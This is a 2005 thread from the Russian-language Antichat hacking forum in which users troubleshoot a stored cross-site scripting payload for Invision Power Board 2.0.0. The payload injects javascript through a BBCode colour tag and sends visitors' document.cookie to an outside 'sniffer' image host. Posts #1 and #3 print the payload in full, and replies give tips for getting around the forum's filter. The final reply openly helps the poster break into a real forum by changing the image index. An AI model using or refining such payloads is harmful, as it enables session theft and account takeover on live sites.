ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)
  #1  
Старый 26.04.2005, 17:40
Аватар для Telepuz
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0

Репутация: 0
По умолчанию Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)

Код:
<div class="postcolor" style='padding:4px;'><span style='color:<img src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[68].src=&quot;http://*******/sniff.jpg?&quot;+document.cookie); </span></div>
Это получается поле вставки скрипта

Код:
[COLOR=]` style=background:url(javascript:document.images[68].src="http://*******/sniff.pg?"+document.cookie); [/COLOR]
перед style появляется />'

Как можно это обойти?
 

  #2  
Старый 26.04.2005, 17:43
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

замени [COLOR=] на [color=#aaaaaa]
если не получится, назови версию форума... если это форум...
я подумаю
 

  #3  
Старый 26.04.2005, 18:02
Аватар для Telepuz
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0

Репутация: 0
По умолчанию

Invision Power Board 2.0.0

Код:
<div class="signature" style="padding: 5px;">
<span style='color:#aaaaaa
<iМg src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' 
/>'>`style=background:url(javascript:document.images
[68].src=&quot;http://armadaplus.com/css/show.gif?&quot;+document.cookie);</sрan></div>
Это получается после присвоения цвета.
Т.е получается так, что подпись не отображается, по идее должен работать скрипт. Но опять появлятеся />
 

  #4  
Старый 26.04.2005, 20:30
Аватар для coyl
coyl
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115

Репутация: 5
По умолчанию

это потому что у тебя опера, а опера не видит знак `. то есть в эксплорере это подействует, а в опере - нет =) вот и всё =)
 

  #5  
Старый 26.04.2005, 21:15
Аватар для Telepuz
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0

Репутация: 0
По умолчанию

нифига =)
Опера никак не вставит />. Это делает форум. Тем более, что проверяю я вставки в Ie.
 

  #6  
Старый 30.04.2005, 22:33
Аватар для Telepuz
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0

Репутация: 0
По умолчанию

Не отключал он теги. Стандартные теги работаю же и я об этом говорил. Так что не пори чушь.
 

  #7  
Старый 01.05.2005, 00:17
Аватар для Super White Jordan
Super White Jordan
Banned
Регистрация: 28.04.2005
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию

Чушь мелишь ссылку давай. Если у тебя в теле сообщения не работает, (Хотя чисто глядя на html который ты дал всё работает) то фильтры стоят.
 

  #8  
Старый 03.05.2005, 00:26
Аватар для Telepuz
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0

Репутация: 0
По умолчанию

Тема закрыта, всем спасибо =)
 

  #9  
Старый 03.05.2005, 04:27
Аватар для Super White Jordan
Super White Jordan
Banned
Регистрация: 28.04.2005
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Telepuz  
Не отключал он теги. Стандартные теги работаю же и я об этом говорил. Так что не пори чушь.
Ну вот Я всё проверил, судя по тому коду который ты тут дал на форуме, он теги в подписи кроме картинки отключил. Откуда Я знаю что он теги в подписи отключил? Ну потому что Я прочитал твой html код который ты сам и дал!!!! Так что год, врать не умеет. =)))

Теперь, ты мне в приват прислал ссылку на тот форум который ты хотел взломать.

Ну так вот, Я там всё проверил, и в подписи и в сообщении фильров нету там всё работает. У тебя снифф не работал потому что у тебя 68 в коде. Это Админы в статье специально зделали чтобы Ламеры (В этом случае к сожалению как ты, но только не обижайся=) ) не ломали форумы. =))))))

Так что поменяй на 1. =))))
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема со сплоитом для ipb 2.0.0 Lord Nikon Форумы 4 22.11.2005 15:51
Invision Power Board 2.0.0 - проблема со вставкой скрипта. Telepuz Форумы 3 05.04.2005 13:49
помогите со вставкой скрипта kviv С/С++, C#, Delphi, .NET, Asm 5 29.03.2005 07:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ